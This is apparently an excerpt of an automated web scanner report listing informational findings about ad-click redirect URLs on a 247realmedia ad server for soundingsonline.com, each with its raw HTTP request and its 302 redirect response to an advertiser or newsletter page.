http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1431245089/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1431245089/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:24:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1436265523/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1436265523/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1436265523/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:50:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1441306759/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1441306759/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.myonlinepubs.com/publication?i=59161

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1441306759/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:46:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.myonlinepubs.com/publication?i=59161
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.myonlinepubs.com/publication?i=59161">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1442210960/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1442210960/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1442210960/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.215. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1446678663/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1446678663/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1446678663/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1446678663/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1447146839/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1447146839/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1447146839/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:49 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1455284800/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1455284800/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.marinalife.com/soundings

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1455284800/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.marinalife.com/soundings
Content-Length: 311
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.marinalife.com/soundings">here</a>.<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/146842624/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/146842624/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/146842624/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:29 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.219. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1474955992/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1474955992/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1474955992/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1474955992/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/14797078/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/14797078/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/14797078/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:09 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.221. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1481879578/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1481879578/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1481879578/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1481879578/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486045072/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486045072/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486045072/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486459418/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486459418/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486459418/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:04 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1488037985/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1488037985/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1488037985/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1500213411/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1500213411/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1500213411/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.226. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1500488251/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1500488251/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1500488251/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1500488251/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:47 GMT
Server: Apache/2.2.3 (Red Hat)
